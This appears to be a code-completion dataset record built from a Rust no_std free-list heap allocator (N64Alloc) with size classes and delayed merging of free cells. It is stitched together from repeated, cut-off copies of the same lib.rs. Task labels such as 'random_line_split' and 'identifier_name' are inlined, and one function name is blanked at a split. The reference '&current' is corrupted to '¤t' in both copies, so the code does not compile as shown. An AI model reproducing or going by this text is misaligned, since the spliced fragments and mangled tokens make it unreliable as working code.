if let Some(ptr) = NonNull::new(ptr) {
self.dealloc_impl(ptr, layout);
}
}
} | random_line_split |
|
lib.rs | #![no_std]
#![allow(clippy::declare_interior_mutable_const)]
#![allow(clippy::cast_ptr_alignment)]
#![allow(clippy::needless_lifetimes)]
extern crate alloc;
mod const_init;
mod imp_static_array;
mod neighbors;
mod size_classes;
use const_init::ConstInit;
use core::alloc::{GlobalAlloc, Layout};
use core::cell::Cell;
use core::cmp;
use core::marker::Sync;
use core::ptr::{self, NonNull};
use core::sync::atomic::{AtomicI32, Ordering};
use imp_static_array as imp;
use memory_units::{size_of, ByteSize, Bytes, Pages, RoundUpTo, Words};
use neighbors::Neighbors;
pub(crate) struct AllocErr;
#[inline]
fn checked_round_up_to<T>(b: Bytes) -> Option<T>
where
T: ByteSize,
Bytes: RoundUpTo<T>,
{
if b.0.checked_add(T::BYTE_SIZE.0).is_none() {
None
} else {
Some(b.round_up_to())
}
}
#[repr(C)]
#[derive(Default, Debug)]
struct CellHeader<'a> {
neighbors: Neighbors<'a, CellHeader<'a>>,
}
impl<'a> AsRef<Neighbors<'a, CellHeader<'a>>> for CellHeader<'a> {
fn as_ref(&self) -> &Neighbors<'a, CellHeader<'a>> {
&self.neighbors
}
}
unsafe impl<'a> neighbors::HasNeighbors<'a, CellHeader<'a>> for CellHeader<'a> {
#[inline]
unsafe fn next_checked(
neighbors: &Neighbors<'a, CellHeader<'a>>,
next: *const CellHeader<'a>,
) -> Option<&'a CellHeader<'a>> {
if next.is_null() || CellHeader::next_cell_is_invalid(neighbors) {
None
} else {
Some(&*next)
}
}
#[inline]
unsafe fn prev_checked(
_neighbors: &Neighbors<'a, CellHeader<'a>>,
prev: *const CellHeader<'a>,
) -> Option<&'a CellHeader<'a>> {
if prev.is_null() {
None
} else {
Some(&*prev)
}
}
}
#[repr(C)]
#[derive(Debug)]
struct AllocatedCell<'a> {
header: CellHeader<'a>,
}
#[test]
fn allocated_cell_layout() {
assert_eq!(
size_of::<CellHeader>(),
size_of::<AllocatedCell>(),
"Safety and correctness depends on AllocatedCell being the same as CellHeader"
);
assert_eq!(
core::mem::align_of::<CellHeader>(),
core::mem::align_of::<AllocatedCell>()
);
}
#[repr(C)]
#[derive(Debug)]
struct FreeCell<'a> {
header: CellHeader<'a>,
next_free_raw: Cell<*const FreeCell<'a>>,
}
#[test]
fn free_cell_layout() {
assert_eq!(
size_of::<CellHeader>() + Words(1),
size_of::<FreeCell>(),
"Safety and correctness depends on FreeCell being only one word larger than CellHeader"
);
assert_eq!(
core::mem::align_of::<CellHeader>(),
core::mem::align_of::<AllocatedCell>()
);
}
impl<'a> CellHeader<'a> {
// ### Semantics of Low Bits in Neighbors Pointers
//
// If `self.neighbors.next_bit_1` is set, then the cell is allocated, and
// should never be in the free list. If the bit is not set, then this cell
// is free, and must be in the free list (or is in the process of being
// added to the free list).
//
// The `self.neighbors.next` pointer always points to the byte just *after*
// this cell. If the `self.neighbors.next_bit_2` bit is not set, then it
// points to the next cell. If that bit is set, then it points to the
// invalid memory that follows this cell.
fn is_allocated(&self) -> bool {
self.neighbors.get_next_bit_1()
}
fn is_free(&self) -> bool {
!self.is_allocated()
}
fn set_allocated(neighbors: &Neighbors<'a, Self>) {
neighbors.set_next_bit_1();
}
fn set_free(neighbors: &Neighbors<'a, Self>) {
neighbors.clear_next_bit_1();
}
fn next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) -> bool {
neighbors.get_next_bit_2()
}
fn set_next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) {
neighbors.set_next_bit_2();
}
fn clear_next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) {
neighbors.clear_next_bit_2();
}
fn size(&self) -> Bytes {
let data = unsafe { (self as *const CellHeader<'a>).offset(1) };
let data = data as usize;
let next = self.neighbors.next_unchecked();
let next = next as usize;
Bytes(next - data)
}
fn as_free_cell(&self) -> Option<&FreeCell<'a>> {
if self.is_free() {
Some(unsafe { &*(self as *const CellHeader as *const FreeCell) })
} else {
None
}
}
// Get a pointer to this cell's data without regard to whether this cell is
// allocated or free.
unsafe fn unchecked_data(&self) -> *const u8 {
(self as *const CellHeader).offset(1) as *const u8
}
// Is this cell aligned to the given power-of-2 alignment?
fn is_aligned_to<B: Into<Bytes>>(&self, align: B) -> bool {
let align = align.into();
let data = unsafe { self.unchecked_data() } as usize;
data & (align.0 - 1) == 0
}
}
impl<'a> FreeCell<'a> {
// Low bits in `FreeCell::next_free_raw`.
//
// If `NEXT_FREE_CELL_CAN_MERGE` is set, then the following invariants hold
// true:
//
// * `FreeCell::next_free_raw` (and'd with the mask) is not null.
// * `FreeCell::next_free_raw` is the adjacent `CellHeader::prev_cell_raw`.
//
// Therefore, this free cell can be merged into a single, larger, contiguous
// free cell with its previous neighbor, which is also the next cell in the
// free list.
const NEXT_FREE_CELL_CAN_MERGE: usize = 0b01;
const _RESERVED: usize = 0b10;
const MASK: usize = !0b11;
fn next_free_can_merge(&self) -> bool {
self.next_free_raw.get() as usize & Self::NEXT_FREE_CELL_CAN_MERGE != 0
}
fn set_next_free_can_merge(&self) {
let next_free = self.next_free_raw.get() as usize;
let next_free = next_free | Self::NEXT_FREE_CELL_CAN_MERGE;
self.next_free_raw.set(next_free as *const FreeCell);
}
fn clear_next_free_can_merge(&self) {
let next_free = self.next_free_raw.get() as usize;
let next_free = next_free & !Self::NEXT_FREE_CELL_CAN_MERGE;
self.next_free_raw.set(next_free as *const FreeCell);
}
fn next_free(&self) -> *const FreeCell<'a> {
let next_free = self.next_free_raw.get() as usize & Self::MASK;
next_free as *const FreeCell<'a>
}
unsafe fn from_uninitialized(
raw: NonNull<u8>,
_size: Bytes,
next_free: Option<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
) -> *const FreeCell<'a> {
let next_free = next_free.unwrap_or(ptr::null_mut());
let raw = raw.as_ptr() as *mut FreeCell;
ptr::write(
raw,
FreeCell {
header: CellHeader::default(),
next_free_raw: Cell::new(next_free),
},
);
raw
}
fn as_allocated_cell(&self, _policy: &dyn AllocPolicy<'a>) -> &AllocatedCell<'a> {
CellHeader::set_allocated(&self.header.neighbors);
unsafe { &*(self as *const FreeCell as *const AllocatedCell) }
}
// Try and satisfy the given allocation request with this cell.
fn try_alloc<'b>(
&'b self,
previous: &'b Cell<*const FreeCell<'a>>,
alloc_size: Words,
align: Bytes,
policy: &dyn AllocPolicy<'a>,
) -> Option<&'b AllocatedCell<'a>> {
// First, do a quick check that this cell can hold an allocation of the
// requested size.
let size: Bytes = alloc_size.into();
if self.header.size() < size {
return None;
}
// Next, try and allocate by splitting this cell in two, and returning
// the second half.
//
// We allocate from the end of this cell, rather than the beginning,
// because it allows us to satisfy alignment requests. Since we can
// choose to split at some alignment and return the aligned cell at the
// end.
let next = self.header.neighbors.next_unchecked() as usize;
let split_and_aligned = (next - size.0) & !(align.0 - 1);
let data = unsafe { self.header.unchecked_data() } as usize;
let min_cell_size: Bytes = policy.min_cell_size(alloc_size).into();
if data + size_of::<CellHeader>().0 + min_cell_size.0 <= split_and_aligned {
let split_cell_head = split_and_aligned - size_of::<CellHeader>().0;
let split_cell = unsafe {
&*FreeCell::from_uninitialized(
unchecked_unwrap(NonNull::new(split_cell_head as *mut u8)),
Bytes(next - split_cell_head) - size_of::<CellHeader>(),
None,
policy,
)
};
Neighbors::append(&self.header, &split_cell.header);
self.clear_next_free_can_merge();
if CellHeader::next_cell_is_invalid(&self.header.neighbors) {
CellHeader::clear_next_cell_is_invalid(&self.header.neighbors);
CellHeader::set_next_cell_is_invalid(&split_cell.header.neighbors);
}
return Some(split_cell.as_allocated_cell(policy));
}
// There isn't enough room to split this cell and still satisfy the
// requested allocation. Because of the early check, we know this cell
// is large enough to fit the requested size, but is the cell's data
// properly aligned?
if self.header.is_aligned_to(align) {
previous.set(self.next_free());
let allocated = self.as_allocated_cell(policy);
return Some(allocated);
}
None
}
fn insert_into_free_list<'b>(
&'b self,
head: &'b Cell<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
) -> &'b Cell<*const FreeCell<'a>> {
self.next_free_raw.set(head.get());
head.set(self);
head
}
}
impl<'a> AllocatedCell<'a> {
unsafe fn as_free_cell(&self, _policy: &dyn AllocPolicy<'a>) -> &FreeCell<'a> {
CellHeader::set_free(&self.header.neighbors);
let free: &FreeCell = &*(self as *const AllocatedCell as *const FreeCell);
free.next_free_raw.set(ptr::null_mut());
free
}
fn data(&self) -> *const u8 {
let cell = &self.header as *const CellHeader;
unsafe { cell.offset(1) as *const u8 }
}
}
trait AllocPolicy<'a> {
unsafe fn new_cell_for_free_list(
&self,
size: Words,
align: Bytes,
) -> Result<*const FreeCell<'a>, AllocErr>;
fn min_cell_size(&self, alloc_size: Words) -> Words;
fn should_merge_adjacent_free_cells(&self) -> bool;
}
struct LargeAllocPolicy;
static LARGE_ALLOC_POLICY: LargeAllocPolicy = LargeAllocPolicy;
impl LargeAllocPolicy {
const MIN_CELL_SIZE: Words = Words(size_classes::SizeClasses::NUM_SIZE_CLASSES * 2);
}
impl<'a> AllocPolicy<'a> for LargeAllocPolicy {
unsafe fn new_cell_for_free_list(
&self,
size: Words,
align: Bytes,
) -> Result<*const FreeCell<'a>, AllocErr> {
// To assure that an allocation will always succeed after refilling the
// free list with this new cell, make sure that we allocate enough to
// fulfill the requested alignment, and still have the minimum cell size
// left over.
let size: Bytes = cmp::max(size.into(), (align + Self::MIN_CELL_SIZE) * Words(2));
let pages: Pages = (size + size_of::<CellHeader>()).round_up_to();
let new_pages = imp::alloc_pages(pages)?;
let allocated_size: Bytes = pages.into();
let free_cell = &*FreeCell::from_uninitialized(
new_pages,
allocated_size - size_of::<CellHeader>(),
None,
self as &dyn AllocPolicy<'a>,
);
let next_cell = (new_pages.as_ptr() as *const u8).add(allocated_size.0);
free_cell
.header
.neighbors
.set_next(next_cell as *const CellHeader);
CellHeader::set_next_cell_is_invalid(&free_cell.header.neighbors);
Ok(free_cell)
}
fn min_cell_size(&self, _alloc_size: Words) -> Words {
Self::MIN_CELL_SIZE
}
fn should_merge_adjacent_free_cells(&self) -> bool {
true
}
}
#[inline]
unsafe fn unchecked_unwrap<T>(o: Option<T>) -> T {
match o {
Some(t) => t,
None => core::hint::unreachable_unchecked(),
}
}
unsafe fn walk_free_list<'a, F, T>(
head: &Cell<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
mut f: F,
) -> Result<T, AllocErr>
where
F: FnMut(&Cell<*const FreeCell<'a>>, &FreeCell<'a>) -> Option<T>,
{
// The previous cell in the free list (not to be confused with the current
// cell's previously _adjacent_ cell).
let previous_free = head;
loop {
let current_free = previous_free.get();
if current_free.is_null() {
return Err(AllocErr);
}
let current_free = Cell::new(current_free);
// Now check if this cell can merge with the next cell in the free
// list.
//
// We don't re-check `policy.should_merge_adjacent_free_cells()` because
// the `NEXT_FREE_CELL_CAN_MERGE` bit only gets set after checking with
// the policy.
while (*current_free.get()).next_free_can_merge() {
let current = &*current_free.get();
current.clear_next_free_can_merge();
let prev_neighbor = unchecked_unwrap(
current
.header
.neighbors
.prev()
.and_then(|p| p.as_free_cell()),
);
current.header.neighbors.remove();
if CellHeader::next_cell_is_invalid(¤t.header.neighbors) {
CellHeader::set_next_cell_is_invalid(&prev_neighbor.header.neighbors);
}
previous_free.set(prev_neighbor);
current_free.set(prev_neighbor);
}
if let Some(result) = f(previous_free, &*current_free.get()) {
return Ok(result);
}
previous_free.set(&*(*current_free.get()).next_free_raw.get());
}
}
/// Do a first-fit allocation from the given free list.
unsafe fn alloc_first_fit<'a>(
size: Words,
align: Bytes,
head: &Cell<*const FreeCell<'a>>,
policy: &dyn AllocPolicy<'a>,
) -> Result<NonNull<u8>, AllocErr> {
walk_free_list(head, policy, |previous, current| {
if let Some(allocated) = current.try_alloc(previous, size, align, policy) {
return Some(unchecked_unwrap(NonNull::new(allocated.data() as *mut u8)));
}
None
})
}
unsafe fn alloc_with_refill<'a, 'b>(
size: Words,
align: Bytes,
head: &'b Cell<*const FreeCell<'a>>,
policy: &dyn AllocPolicy<'a>,
) -> Result<NonNull<u8>, AllocErr> {
if let Ok(result) = alloc_first_fit(size, align, head, policy) {
return Ok(result);
}
let cell = policy.new_cell_for_free_list(size, align)?;
let head = (*cell).insert_into_free_list(head, policy);
alloc_first_fit(size, align, head, policy)
}
/// A n64 allocator.
///
/// # Safety
///
/// When used in unix environments, cannot move in memory. Typically not an
/// issue if you're just using this as a `static` global allocator.
pub struct N64Alloc<'a> {
head: imp::Exclusive<*const FreeCell<'a>>,
size_classes: size_classes::SizeClasses<'a>,
}
unsafe impl<'a> Sync for N64Alloc<'a> {}
impl<'a> ConstInit for N64Alloc<'a> {
const INIT: N64Alloc<'a> = N64Alloc {
head: imp::Exclusive::INIT,
size_classes: size_classes::SizeClasses::INIT,
};
}
impl<'a> N64Alloc<'a> {
/// An initial `const` default construction of a `N64Alloc` allocator.
///
/// This is usable for initializing `static`s that get set as the global
/// allocator.
pub const INIT: Self = <Self as ConstInit>::INIT;
unsafe fn with_free_list_and_policy_for_size<F, T>(&self, size: Words, align: Bytes, f: F) -> T
where
F: for<'b> FnOnce(&'b Cell<*const FreeCell<'a>>, &'b dyn AllocPolicy<'a>) -> T,
{
if align <= size_of::<usize>() {
if let Some(head) = self.size_classes.get(size) {
let policy = size_classes::SizeClassAllocPolicy(&self.head);
let policy = &policy as &dyn AllocPolicy<'a>;
return head.with_exclusive_access(|head| {
let head_cell = Cell::new(*head);
let result = f(&head_cell, policy);
*head = head_cell.get();
result
});
}
}
let policy = &LARGE_ALLOC_POLICY as &dyn AllocPolicy<'a>;
self.head.with_exclusive_access(|head| {
let head_cell = Cell::new(*head);
let result = f(&head_cell, policy);
*head = head_cell.get();
result
})
}
unsafe fn alloc_impl(&self, layout: Layout) -> Result<NonNull<u8>, AllocErr> {
let size = Bytes(layout.size());
let align = if layout.align() == 0 {
Bytes(1)
} else {
Bytes(layout.align())
};
if size.0 == 0 {
// Ensure that our made up pointer is properly aligned by using the
// alignment as the pointer.
return Ok(NonNull::new_unchecked(align.0 as *mut u8));
}
let word_size: Words = checked_round_up_to(size).ok_or(AllocErr)?;
self.with_free_list_and_policy_for_size(word_size, align, |head, policy| {
alloc_with_refill(word_size, align, head, policy)
})
}
unsafe fn dealloc_impl(&self, ptr: NonNull<u8>, layout: Layout) {
let size = Bytes(layout.size());
if size.0 == 0 {
return;
}
let size: Words = size.round_up_to();
let align = Bytes(layout.align());
self.with_free_list_and_policy_for_size(size, align, |head, policy| {
let cell = (ptr.as_ptr() as *mut CellHeader<'a> as *const CellHeader<'a>).offset(-1);
let cell = &*cell;
let cell: &AllocatedCell<'a> = &*(cell as *const CellHeader as *const AllocatedCell);
let free = cell.as_free_cell(policy);
if policy.should_merge_adjacent_free_cells() {
// Merging with the _previous_ adjacent cell is easy: it is
// already in the free list, so folding this cell into it is all
// that needs to be done. The free list can be left alone.
//
// Merging with the _next_ adjacent cell is a little harder. It
// is already in the free list, but we need to splice it out
// from the free list, since its header will become invalid
// after consolidation, and it is *this* cell's header that
// needs to be in the free list. But we don't have access to the
// pointer pointing to the soon-to-be-invalid header, and
// therefore can't adjust that pointer. So we have a delayed
// consolidation scheme. We insert this cell just after the next
// adjacent cell in the free list, and set the next adjacent
// cell's `NEXT_FREE_CAN_MERGE` bit. The next time that we walk
// the free list for allocation, the bit will be checked and the
// consolidation will happen at that time.
//
// If _both_ the previous and next adjacent cells are free, we
// are faced with a dilemma. We cannot merge all previous,
// current, and next cells together because our singly-linked
// free list doesn't allow for that kind of arbitrary appending
// and splicing. There are a few different kinds of tricks we
// could pull here, but they would increase implementation
// complexity and code size. Instead, we use a heuristic to
// choose whether to merge with the previous or next adjacent
// cell. We could choose to merge with whichever neighbor cell
// is smaller or larger, but we don't. We prefer the previous
// adjacent cell because we can greedily consolidate with it
// immediately, whereas the consolidating with the next adjacent
// cell must be delayed, as explained above.
if let Some(prev) = free
.header
.neighbors
.prev()
.and_then(|p| (*p).as_free_cell())
{
free.header.neighbors.remove();
if CellHeader::next_cell_is_invalid(&free.header.neighbors) {
CellHeader::set_next_cell_is_invalid(&prev.header.neighbors);
}
return;
}
if let Some(next) = free
.header
.neighbors
.next()
.and_then(|n| (*n).as_free_cell())
{
free.next_free_raw.set(next.next_free());
next.next_free_raw.set(free);
next.set_next_free_can_merge();
return;
}
}
// Either we don't want to merge cells for the current policy, or we
// didn't have the opportunity to do any merging with our adjacent
// neighbors. In either case, push this cell onto the front of the
// free list.
let _head = free.insert_into_free_list(head, policy);
});
}
}
pub static ALLOC_BYTES_LEFT: AtomicI32 = AtomicI32::new(imp::SCRATCH_LEN_BYTES as i32);
pub static ALLOC_BYTES_USED: AtomicI32 = AtomicI32::new(0);
pub use imp::OFFSET as ALLOC_PAGE_OFFSET;
unsafe impl GlobalAlloc for N64Alloc<'static> {
unsafe fn alloc(&self, layout: Layout) -> *mut u8 {
ALLOC_BYTES_LEFT.fetch_sub(layout.size() as i32, Ordering::SeqCst);
ALLOC_BYTES_USED.fetch_add(layout.size() as i32, Ordering::SeqCst);
match self.alloc_impl(layout) {
Ok(ptr) => ptr.as_ptr(),
Err(AllocErr) => ptr::null_mut(),
}
}
unsafe fn | (&self, ptr: *mut u8, layout: Layout) {
ALLOC_BYTES_LEFT.fetch_add(layout.size() as i32, Ordering::SeqCst);
ALLOC_BYTES_USED.fetch_sub(layout.size() as i32, Ordering::SeqCst);
if let Some(ptr) = NonNull::new(ptr) {
self.dealloc_impl(ptr, layout);
}
}
}
| dealloc | identifier_name |
lib.rs | #![no_std]
#![allow(clippy::declare_interior_mutable_const)]
#![allow(clippy::cast_ptr_alignment)]
#![allow(clippy::needless_lifetimes)]
extern crate alloc;
mod const_init;
mod imp_static_array;
mod neighbors;
mod size_classes;
use const_init::ConstInit;
use core::alloc::{GlobalAlloc, Layout};
use core::cell::Cell;
use core::cmp;
use core::marker::Sync;
use core::ptr::{self, NonNull};
use core::sync::atomic::{AtomicI32, Ordering};
use imp_static_array as imp;
use memory_units::{size_of, ByteSize, Bytes, Pages, RoundUpTo, Words};
use neighbors::Neighbors;
pub(crate) struct AllocErr;
#[inline]
fn checked_round_up_to<T>(b: Bytes) -> Option<T>
where
T: ByteSize,
Bytes: RoundUpTo<T>,
{
if b.0.checked_add(T::BYTE_SIZE.0).is_none() {
None
} else {
Some(b.round_up_to())
}
}
#[repr(C)]
#[derive(Default, Debug)]
struct CellHeader<'a> {
neighbors: Neighbors<'a, CellHeader<'a>>,
}
impl<'a> AsRef<Neighbors<'a, CellHeader<'a>>> for CellHeader<'a> {
fn as_ref(&self) -> &Neighbors<'a, CellHeader<'a>> {
&self.neighbors
}
}
unsafe impl<'a> neighbors::HasNeighbors<'a, CellHeader<'a>> for CellHeader<'a> {
#[inline]
unsafe fn next_checked(
neighbors: &Neighbors<'a, CellHeader<'a>>,
next: *const CellHeader<'a>,
) -> Option<&'a CellHeader<'a>> {
if next.is_null() || CellHeader::next_cell_is_invalid(neighbors) {
None
} else {
Some(&*next)
}
}
#[inline]
unsafe fn prev_checked(
_neighbors: &Neighbors<'a, CellHeader<'a>>,
prev: *const CellHeader<'a>,
) -> Option<&'a CellHeader<'a>> {
if prev.is_null() {
None
} else {
Some(&*prev)
}
}
}
#[repr(C)]
#[derive(Debug)]
struct AllocatedCell<'a> {
header: CellHeader<'a>,
}
#[test]
fn allocated_cell_layout() {
assert_eq!(
size_of::<CellHeader>(),
size_of::<AllocatedCell>(),
"Safety and correctness depends on AllocatedCell being the same as CellHeader"
);
assert_eq!(
core::mem::align_of::<CellHeader>(),
core::mem::align_of::<AllocatedCell>()
);
}
#[repr(C)]
#[derive(Debug)]
struct FreeCell<'a> {
header: CellHeader<'a>,
next_free_raw: Cell<*const FreeCell<'a>>,
}
#[test]
fn free_cell_layout() {
assert_eq!(
size_of::<CellHeader>() + Words(1),
size_of::<FreeCell>(),
"Safety and correctness depends on FreeCell being only one word larger than CellHeader"
);
assert_eq!(
core::mem::align_of::<CellHeader>(),
core::mem::align_of::<AllocatedCell>()
);
}
impl<'a> CellHeader<'a> {
// ### Semantics of Low Bits in Neighbors Pointers
//
// If `self.neighbors.next_bit_1` is set, then the cell is allocated, and
// should never be in the free list. If the bit is not set, then this cell
// is free, and must be in the free list (or is in the process of being
// added to the free list).
//
// The `self.neighbors.next` pointer always points to the byte just *after*
// this cell. If the `self.neighbors.next_bit_2` bit is not set, then it
// points to the next cell. If that bit is set, then it points to the
// invalid memory that follows this cell.
fn is_allocated(&self) -> bool {
self.neighbors.get_next_bit_1()
}
fn is_free(&self) -> bool {
!self.is_allocated()
}
fn set_allocated(neighbors: &Neighbors<'a, Self>) {
neighbors.set_next_bit_1();
}
fn set_free(neighbors: &Neighbors<'a, Self>) {
neighbors.clear_next_bit_1();
}
fn next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) -> bool {
neighbors.get_next_bit_2()
}
fn set_next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) {
neighbors.set_next_bit_2();
}
fn clear_next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) {
neighbors.clear_next_bit_2();
}
fn size(&self) -> Bytes {
let data = unsafe { (self as *const CellHeader<'a>).offset(1) };
let data = data as usize;
let next = self.neighbors.next_unchecked();
let next = next as usize;
Bytes(next - data)
}
fn as_free_cell(&self) -> Option<&FreeCell<'a>> {
if self.is_free() {
Some(unsafe { &*(self as *const CellHeader as *const FreeCell) })
} else {
None
}
}
// Get a pointer to this cell's data without regard to whether this cell is
// allocated or free.
unsafe fn unchecked_data(&self) -> *const u8 {
(self as *const CellHeader).offset(1) as *const u8
}
// Is this cell aligned to the given power-of-2 alignment?
fn is_aligned_to<B: Into<Bytes>>(&self, align: B) -> bool {
let align = align.into();
let data = unsafe { self.unchecked_data() } as usize;
data & (align.0 - 1) == 0
}
}
impl<'a> FreeCell<'a> {
// Low bits in `FreeCell::next_free_raw`.
//
// If `NEXT_FREE_CELL_CAN_MERGE` is set, then the following invariants hold
// true:
//
// * `FreeCell::next_free_raw` (and'd with the mask) is not null.
// * `FreeCell::next_free_raw` is the adjacent `CellHeader::prev_cell_raw`.
//
// Therefore, this free cell can be merged into a single, larger, contiguous
// free cell with its previous neighbor, which is also the next cell in the
// free list.
const NEXT_FREE_CELL_CAN_MERGE: usize = 0b01;
const _RESERVED: usize = 0b10;
const MASK: usize = !0b11;
fn next_free_can_merge(&self) -> bool {
self.next_free_raw.get() as usize & Self::NEXT_FREE_CELL_CAN_MERGE != 0
}
fn set_next_free_can_merge(&self) {
let next_free = self.next_free_raw.get() as usize;
let next_free = next_free | Self::NEXT_FREE_CELL_CAN_MERGE;
self.next_free_raw.set(next_free as *const FreeCell);
}
fn clear_next_free_can_merge(&self) {
let next_free = self.next_free_raw.get() as usize;
let next_free = next_free & !Self::NEXT_FREE_CELL_CAN_MERGE;
self.next_free_raw.set(next_free as *const FreeCell);
}
fn next_free(&self) -> *const FreeCell<'a> {
let next_free = self.next_free_raw.get() as usize & Self::MASK;
next_free as *const FreeCell<'a>
}
unsafe fn from_uninitialized(
raw: NonNull<u8>,
_size: Bytes,
next_free: Option<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
) -> *const FreeCell<'a> {
let next_free = next_free.unwrap_or(ptr::null_mut());
let raw = raw.as_ptr() as *mut FreeCell;
ptr::write(
raw,
FreeCell {
header: CellHeader::default(),
next_free_raw: Cell::new(next_free),
},
);
raw
}
fn as_allocated_cell(&self, _policy: &dyn AllocPolicy<'a>) -> &AllocatedCell<'a> {
CellHeader::set_allocated(&self.header.neighbors);
unsafe { &*(self as *const FreeCell as *const AllocatedCell) }
}
// Try and satisfy the given allocation request with this cell.
fn try_alloc<'b>(
&'b self,
previous: &'b Cell<*const FreeCell<'a>>,
alloc_size: Words,
align: Bytes,
policy: &dyn AllocPolicy<'a>,
) -> Option<&'b AllocatedCell<'a>> {
// First, do a quick check that this cell can hold an allocation of the
// requested size.
let size: Bytes = alloc_size.into();
if self.header.size() < size {
return None;
}
// Next, try and allocate by splitting this cell in two, and returning
// the second half.
//
// We allocate from the end of this cell, rather than the beginning,
// because it allows us to satisfy alignment requests. Since we can
// choose to split at some alignment and return the aligned cell at the
// end.
let next = self.header.neighbors.next_unchecked() as usize;
let split_and_aligned = (next - size.0) & !(align.0 - 1);
let data = unsafe { self.header.unchecked_data() } as usize;
let min_cell_size: Bytes = policy.min_cell_size(alloc_size).into();
if data + size_of::<CellHeader>().0 + min_cell_size.0 <= split_and_aligned {
let split_cell_head = split_and_aligned - size_of::<CellHeader>().0;
let split_cell = unsafe {
&*FreeCell::from_uninitialized(
unchecked_unwrap(NonNull::new(split_cell_head as *mut u8)),
Bytes(next - split_cell_head) - size_of::<CellHeader>(),
None,
policy,
)
};
Neighbors::append(&self.header, &split_cell.header);
self.clear_next_free_can_merge();
if CellHeader::next_cell_is_invalid(&self.header.neighbors) {
CellHeader::clear_next_cell_is_invalid(&self.header.neighbors);
CellHeader::set_next_cell_is_invalid(&split_cell.header.neighbors);
}
return Some(split_cell.as_allocated_cell(policy));
}
// There isn't enough room to split this cell and still satisfy the
// requested allocation. Because of the early check, we know this cell
// is large enough to fit the requested size, but is the cell's data
// properly aligned?
if self.header.is_aligned_to(align) {
previous.set(self.next_free());
let allocated = self.as_allocated_cell(policy);
return Some(allocated);
}
None
}
fn insert_into_free_list<'b>(
&'b self,
head: &'b Cell<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
) -> &'b Cell<*const FreeCell<'a>> {
self.next_free_raw.set(head.get());
head.set(self);
head
}
}
impl<'a> AllocatedCell<'a> {
unsafe fn as_free_cell(&self, _policy: &dyn AllocPolicy<'a>) -> &FreeCell<'a> {
CellHeader::set_free(&self.header.neighbors);
let free: &FreeCell = &*(self as *const AllocatedCell as *const FreeCell);
free.next_free_raw.set(ptr::null_mut());
free
}
fn data(&self) -> *const u8 {
let cell = &self.header as *const CellHeader;
unsafe { cell.offset(1) as *const u8 }
}
}
trait AllocPolicy<'a> {
unsafe fn new_cell_for_free_list(
&self,
size: Words,
align: Bytes,
) -> Result<*const FreeCell<'a>, AllocErr>;
fn min_cell_size(&self, alloc_size: Words) -> Words;
fn should_merge_adjacent_free_cells(&self) -> bool;
}
struct LargeAllocPolicy;
static LARGE_ALLOC_POLICY: LargeAllocPolicy = LargeAllocPolicy;
impl LargeAllocPolicy {
const MIN_CELL_SIZE: Words = Words(size_classes::SizeClasses::NUM_SIZE_CLASSES * 2);
}
impl<'a> AllocPolicy<'a> for LargeAllocPolicy {
unsafe fn new_cell_for_free_list(
&self,
size: Words,
align: Bytes,
) -> Result<*const FreeCell<'a>, AllocErr> {
// To assure that an allocation will always succeed after refilling the
// free list with this new cell, make sure that we allocate enough to
// fulfill the requested alignment, and still have the minimum cell size
// left over.
let size: Bytes = cmp::max(size.into(), (align + Self::MIN_CELL_SIZE) * Words(2));
let pages: Pages = (size + size_of::<CellHeader>()).round_up_to();
let new_pages = imp::alloc_pages(pages)?;
let allocated_size: Bytes = pages.into();
let free_cell = &*FreeCell::from_uninitialized(
new_pages,
allocated_size - size_of::<CellHeader>(),
None,
self as &dyn AllocPolicy<'a>,
);
let next_cell = (new_pages.as_ptr() as *const u8).add(allocated_size.0);
free_cell
.header
.neighbors
.set_next(next_cell as *const CellHeader);
CellHeader::set_next_cell_is_invalid(&free_cell.header.neighbors);
Ok(free_cell)
}
fn min_cell_size(&self, _alloc_size: Words) -> Words {
Self::MIN_CELL_SIZE
}
fn should_merge_adjacent_free_cells(&self) -> bool {
true
}
}
#[inline]
unsafe fn unchecked_unwrap<T>(o: Option<T>) -> T {
match o {
Some(t) => t,
None => core::hint::unreachable_unchecked(),
}
}
unsafe fn walk_free_list<'a, F, T>(
head: &Cell<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
mut f: F,
) -> Result<T, AllocErr>
where
F: FnMut(&Cell<*const FreeCell<'a>>, &FreeCell<'a>) -> Option<T>,
{
// The previous cell in the free list (not to be confused with the current
// cell's previously _adjacent_ cell).
let previous_free = head;
loop {
let current_free = previous_free.get();
if current_free.is_null() {
return Err(AllocErr);
}
let current_free = Cell::new(current_free);
// Now check if this cell can merge with the next cell in the free
// list.
//
// We don't re-check `policy.should_merge_adjacent_free_cells()` because
// the `NEXT_FREE_CELL_CAN_MERGE` bit only gets set after checking with
// the policy.
while (*current_free.get()).next_free_can_merge() {
let current = &*current_free.get();
current.clear_next_free_can_merge();
let prev_neighbor = unchecked_unwrap(
current
.header
.neighbors
.prev()
.and_then(|p| p.as_free_cell()),
);
current.header.neighbors.remove();
if CellHeader::next_cell_is_invalid(¤t.header.neighbors) {
CellHeader::set_next_cell_is_invalid(&prev_neighbor.header.neighbors);
}
previous_free.set(prev_neighbor);
current_free.set(prev_neighbor);
}
if let Some(result) = f(previous_free, &*current_free.get()) {
return Ok(result);
}
previous_free.set(&*(*current_free.get()).next_free_raw.get());
}
}
/// Do a first-fit allocation from the given free list.
unsafe fn alloc_first_fit<'a>(
size: Words,
align: Bytes,
head: &Cell<*const FreeCell<'a>>,
policy: &dyn AllocPolicy<'a>,
) -> Result<NonNull<u8>, AllocErr> {
walk_free_list(head, policy, |previous, current| {
if let Some(allocated) = current.try_alloc(previous, size, align, policy) {
return Some(unchecked_unwrap(NonNull::new(allocated.data() as *mut u8)));
}
None
})
}
unsafe fn alloc_with_refill<'a, 'b>(
size: Words,
align: Bytes,
head: &'b Cell<*const FreeCell<'a>>,
policy: &dyn AllocPolicy<'a>,
) -> Result<NonNull<u8>, AllocErr> {
if let Ok(result) = alloc_first_fit(size, align, head, policy) {
return Ok(result);
}
